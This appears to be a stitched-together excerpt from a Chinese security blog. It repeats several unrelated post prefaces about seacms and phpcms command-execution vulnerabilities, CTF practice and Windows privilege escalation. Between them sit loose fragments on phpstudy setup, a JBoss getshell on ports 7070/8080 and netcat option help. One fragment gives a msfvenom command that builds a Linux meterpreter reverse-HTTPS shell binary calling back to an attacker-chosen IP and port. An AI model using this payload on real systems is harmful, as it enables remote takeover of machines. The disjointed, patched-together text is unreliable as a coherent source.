前言

很早的洞了一直没仔细研究下(主要是看了几天审计太难受了)。

前言

seacms从6.45开始到6.55一直存在命令执行，打了补丁也会被绕过。6.66在新的位置也爆出了代码执行……

前言

前面只分析了phpcms9.6.0，现在把后面的补上。

前言

想到写这么一篇文章只要是之前三叶草的ctf出过这样一题，当时还是问的学长… 当然ctf还是学到东西为主，这里仔细研究一下。

前言

粗浅的分析下phpcms的几个版本的漏洞，附上exp。

前言

win提权也是告一段落了，最近一段时间感觉收获不多，人的惰性真可怕！！！

反弹shell

msfvenom -p linux/x86/meterpreter_reverse_https
LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

网站权限配置

这里偷了个懒使用的是phpstudy集成环境。

创建apache服务(不创建没法设置启动权限)

getshell很简单，目标开放7070/8080端口，都是web服务，7070存在jboss漏洞拿到交互式shell。

参数：

 -g <网关> 设置路由器跃程通信网关，最多可设置8个；
 -G <指向器数目> 设置来源路由指向器，其数值为4的倍数；
 -h 在线帮助；